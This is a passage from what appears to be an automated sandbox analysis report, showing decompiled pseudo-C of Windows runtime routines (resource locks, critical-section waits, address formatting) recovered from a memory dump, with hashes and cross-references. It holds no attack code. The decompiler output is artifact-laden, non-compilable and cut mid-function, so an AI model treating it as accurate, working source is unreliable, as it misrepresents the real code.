								if(__eflags < 0) {
									_push(_t51);
									E01E53915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01ef01c0;
												_push(_t138);
												_push(0);
												_t58 = E01E0F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01E54FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01E63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01E63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01E9217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01E63F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01E53915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01E35384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01E0F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01E53915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01E0F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01E53915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01E0F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01E53915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E01E35329(_t110, _t138);
																return E01E353A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x01e5055a
0x01e5055d
0x01e50563
0x01e50566
0x01e505d8
0x01e505e2
0x01e505e5
0x00000000
0x01e505e7
0x01e505e7
0x01e505ea
0x01e505f3
0x01e505f3
0x01e50568
0x01e50568
0x01e50568
0x01e50569
0x01e50569
0x01e50569
0x01e5056b
0x00000000
0x00000000
0x01e7217f
0x01e72183
0x01e7225b
0x01e7225f
0x01e72189
0x01e7218c
0x01e7218f
0x01e72194
0x01e72199
0x01e7219d
0x01e721a0
0x01e721a2
0x01e721ce
0x01e721ce
0x01e721ce
0x01e721d0
0x01e721d6
0x01e721de
0x01e721e2
0x01e721e8
0x01e721e9
0x01e721ec
0x01e721f1
0x01e721f6
0x00000000
0x00000000
0x01e721f8
0x01e721fb
0x01e72206
0x01e7220b
0x01e7220c
0x01e72217
0x01e72226
0x01e7222b
0x01e7222c
0x01e7222f
0x01e72232
0x01e72235
0x01e72235
0x01e7223a
0x01e7223f
0x01e72241
0x01e72243
0x01e72248
0x01e72248
0x01e7224d
0x01e7224f
0x01e72262
0x01e72263
0x01e72268
0x01e72269
0x01e72269
0x01e72269
0x01e7226d
0x00000000
0x00000000
0x01e72276
0x01e72279
0x01e7227e
0x01e72283
0x01e72287
0x01e7228a
0x01e7228d
0x01e7228f
0x01e722bc
0x01e722bc
0x01e722bc
0x01e722be
0x01e722c4
0x01e722cc
0x01e722d0
0x01e722d6
0x01e722d7
0x01e722da
0x01e722df
0x01e722e4
0x00000000
0x00000000
0x01e722e6
0x01e722e9
0x01e722f4
0x01e722f9
0x01e722fa
0x01e72305
0x01e72314
0x01e72319
0x01e7231a
0x01e7231d
0x01e72320
0x01e72323
0x01e72323
0x01e72328
0x01e7232d
0x01e7232f
0x01e72331
0x01e72336
0x01e72336
0x01e7233b
0x01e7233d
0x01e72350
0x01e72351
0x01e72356
0x01e72359
0x01e72359
0x01e7235b
0x01e7235d
0x01e35367
0x01e3536b
0x01e35372
0x00000000
0x00000000
0x00000000
0x00000000
0x01e72363
0x01e72363
0x01e72369
0x01e7236a
0x01e7236c
0x01e72371
0x01e72373
0x00000000
0x01e72379
0x01e72379
0x01e7237a
0x01e7237f
0x01e7237f
0x01e72385
0x01e72386
0x01e72389
0x01e7238e
0x01e72390
0x01e35378
0x01e3537c
0x01e72396
0x01e72396
0x01e72397
0x01e7239c
0x01e723a2
0x01e723a3
0x01e723a6
0x01e723ab
0x01e723ad
0x00000000
0x01e723b3
0x01e723b3
0x01e723b4
0x01e723b9
0x01e723ba
0x01e723ba
0x01e723bc
0x01e723bf
0x00000000
0x00000000
0x01e69153
0x01e69158
0x01e6915a
0x01e6915e
0x01e69160
0x00000000
0x01e69166
0x01e69166
0x01e69171
0x01e69176
0x01e69176
0x00000000
0x01e69160
0x01e723c6
0x01e723d7
0x01e723d7
0x01e723ad
0x01e72390
0x01e72373
0x01e7233f
0x01e7233f
0x00000000
0x01e7233f
0x01e72291
0x01e72291
0x01e72293
0x01e72295
0x01e7229a
0x01e722a1
0x01e722a3
0x01e722a7
0x01e722a9
0x00000000
0x00000000
0x01e722ab
0x01e722ad
0x01e722af
0x00000000
0x00000000
0x00000000
0x01e722af
0x01e722b1
0x01e722b4
0x01e722b4
0x01e722b6
0x01e353be
0x01e353be
0x01e353be
0x01e353c0
0x00000000
0x00000000
0x01e353cb
0x01e353ce
0x01e353d0
0x01e353d4
0x01e353d6
0x00000000
0x01e353d8
0x01e353e3
0x01e353ea
0x01e353ea
0x00000000
0x01e353d6
0x00000000
0x00000000
0x00000000
0x00000000
0x01e722b6
0x00000000
0x01e7228f
0x01e72349
0x01e7234d
0x01e72251
0x01e72251
0x00000000
0x01e72251
0x01e721a4
0x01e721a4
0x01e721a6
0x01e721a8
0x01e721ac
0x01e721b6
0x01e721b8
0x01e721bc
0x01e721be
0x00000000
0x00000000
0x01e721c0
0x01e721c2
0x01e721c4
0x00000000
0x00000000
0x00000000
0x01e721c4
0x01e721c6
0x01e721c6
0x01e721c8
0x00000000
0x00000000
0x00000000
0x00000000
0x01e721c8
0x01e721a2
0x00000000
0x01e72183
0x01e5057b
0x01e5057d
0x01e50581
0x01e50583
0x01e72178
0x00000000
0x01e50589
0x01e5058f
0x01e5058f
0x01e50583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01E72206

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01E7220E
RTL: Re-Waiting, xrefs: 01E7223A, 01E72328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01E722FC
RTL: Resource at %p, xrefs: 01E7221D, 01E7230B

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 8d89ee88f3039d4d2e914cebf2d60a8a93e92199b8525c750223116f54146039
Instruction ID: 30cd740d176c00da35c4be95f3d61003bf56190a6481723282bfbc0df4026a82
Opcode Fuzzy Hash: 8d89ee88f3039d4d2e914cebf2d60a8a93e92199b8525c750223116f54146039
Instruction Fuzzy Hash: 1D513D757402536BFB15CA19DC81FAE33AAAF94714F21A219FE48DB3C5E631EC818790

Uniqueness

Uniqueness Score: -1.00%

Function 01E514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01E514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x1ef2088; // 0x776a2a97
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01E47707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01E513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01E47707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01E47707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01E12340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01E1E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x01e514c0
0x01e514cb
0x01e514d2
0x01e514d6
0x01e514da
0x01e514de
0x01e514e3
0x01e5157a
0x01e5157a
0x01e514f1
0x01e514f3
0x01e7ea0f
0x00000000
0x01e7ea15
0x00000000
0x01e7ea15
0x01e514f9
0x01e514f9
0x01e514fe
0x01e51504
0x01e7ea1a
0x01e7ea1f
0x01e7ea21
0x01e7ea22
0x01e7ea27
0x01e7ea2a
0x01e7ea2a
0x01e51515
0x01e51517
0x01e5156d
0x01e51572
0x01e51575
0x01e51575
0x01e5151e
0x01e7ea50
0x01e7ea55
0x01e7ea58
0x01e7ea58
0x01e5152e
0x01e51531
0x01e51533
0x00000000
0x01e51535
0x01e51541
0x01e51549
0x01e51549
0x01e51533
0x01e514f3
0x01e51559

APIs

___swprintf_l.LIBCMT ref: 01E7EA22

Part of subcall function 01E513CB: ___swprintf_l.LIBCMT ref: 01E5146B
Part of subcall function 01E513CB: ___swprintf_l.LIBCMT ref: 01E51490

___swprintf_l.LIBCMT ref: 01E5156D

Strings

%%%u, xrefs: 01E51564
]:%u, xrefs: 01E7EA47

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: a5c9e0c2b4656b1c78afcb17a1147e30c178194b125f9c665d02c2a43a28f17b
Instruction ID: 9f7a4e90f0e4d1c2165cc4c7abd5a9c55758e85ff968e5e4859e5ca54c6b195b
Opcode Fuzzy Hash: a5c9e0c2b4656b1c78afcb17a1147e30c178194b125f9c665d02c2a43a28f17b
Instruction Fuzzy Hash: F521D27290021A9BDB61EF58DC44BEE77BCBF14708F886465ED46D3140EB70EA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01E353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01E353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01ef01c0;
									_push(_t92);
									_push(0);
									_t37 = E01E0F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01E54FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01E63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01E63F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01E9217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01E63F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01E53915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01E35384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01E0F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01E53915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01E0F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01E53915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01E0F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01E53915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E01E35329(_t74, _t92);
													_push(1);
													return E01E353A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x01e353ab
0x01e353ae
0x01e353b1
0x01e353b4
0x01e353b7
0x01e505b6
0x01e505c0
0x01e505c3
0x00000000
0x01e505c9
0x01e505c9
0x01e505cc
0x01e505d5
0x01e505d5
0x01e353bd
0x01e353bd
0x01e353bd
0x01e353be
0x01e353be
0x01e353be
0x01e353c0
0x00000000
0x00000000
0x01e72269
0x01e7226d
0x01e72349
0x01e7234d
0x01e72273
0x01e72276
0x01e72279
0x01e7227e
0x01e72283
0x01e72287
0x01e7228a
0x01e7228d
0x01e7228f
0x01e722bc
0x01e722bc
0x01e722bc
0x01e722be
0x01e722c4
0x01e722cc
0x01e722d0
0x01e722d6
0x01e722d7
0x01e722da
0x01e722df
0x01e722e4
0x00000000
0x00000000
0x01e722e6
0x01e722e9
0x01e722f4
0x01e722f9
0x01e722fa
0x01e72305
0x01e72314
0x01e72319
0x01e7231a
0x01e7231d
0x01e72320
0x01e72323
0x01e72323
0x01e72328
0x01e7232d
0x01e7232f
0x01e72331
0x01e72336
0x01e72336
0x01e7233b
0x01e7233d
0x01e72350
0x01e72351
0x01e72356
0x01e72359
0x01e72359
0x01e7235b
0x01e7235d
0x01e35367
0x01e3536b
0x01e35372
0x00000000
0x00000000
0x00000000
0x00000000
0x01e72363
0x01e72363
0x01e72369
0x01e7236a
0x01e7236c
0x01e72371
0x01e72373
0x00000000
0x01e72379
0x01e72379
0x01e7237a
0x01e7237f
0x01e7237f
0x01e72385
0x01e72386
0x01e72389
0x01e7238e
0x01e72390
0x01e35378
0x01e3537c
0x01e72396
0x01e72396
0x01e72397
0x01e7239c
0x01e723a2
0x01e723a3
0x01e723a6
0x01e723ab
0x01e723ad
0x00000000
0x01e723b3
0x01e723b3
0x01e723b4
0x01e723b9
0x01e723ba
0x01e723ba
0x01e723bc
0x01e723bf
0x00000000
0x00000000
0x01e69153
0x01e69158
0x01e6915a
0x01e6915e
0x01e69160
0x00000000
0x01e69166
0x01e69166
0x01e69171
0x01e69176
0x01e69176
0x00000000
0x01e69160
0x01e723c6
0x01e723cb
0x01e723d7
0x01e723d7
0x01e723ad
0x01e72390
0x01e72373
0x01e7233f
0x01e7233f
0x00000000
0x01e7233f
0x01e72291
0x01e72291
0x01e72293
0x01e72295
0x01e7229a
0x01e722a1
0x01e722a3
0x01e722a7
0x01e722a9
0x00000000
0x00000000
0x01e722ab
0x01e722ad
0x01e722af
0x00000000
0x00000000
0x00000000
0x01e722af
0x01e722b1
0x01e722b4
0x01e722b4
0x01e722b6
0x00000000
0x00000000
0x00000000
0x00000000
0x01e722b6
0x01e7228f
0x00000000
0x01e7226d
0x01e353cb
0x01e353ce
0x01e353d0
0x01e353d4
0x01e353d6
0x00000000
0x01e353d8
0x01e353e3
0x01e353ea
0x01e353ea
0x01e353d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01E722F4

Strings

RTL: Re-Waiting, xrefs: 01E72328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01E722FC
RTL: Resource at %p, xrefs: 01E7230B

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 57b2a74b9969a2d05dc12b62672c997b31acb18fe729c6905a8f0b409360d1f0
Instruction ID: aff938818d49ce99a235d6daa62e1ecaeddd360dbe1e23f8a4b76041d1ca7c1b
Opcode Fuzzy Hash: 57b2a74b9969a2d05dc12b62672c997b31acb18fe729c6905a8f0b409360d1f0
Instruction Fuzzy Hash: B45127716003436BEB119B29CC80FAE73ADEF94724F116219FE48DB285EA61E841C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01E3EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E01E3EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01E2DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1ef793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01E116C0(_t39);
				} else {
					_t40 = E01E0F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01E53915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01E101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1ef793c; // 0x0
								_push(_t85);
								_t44 = E01E11F28(_t71);
							} else {
								_t44 = E01E0F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01E53915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01E92306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01E3EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01E54FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01E63F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
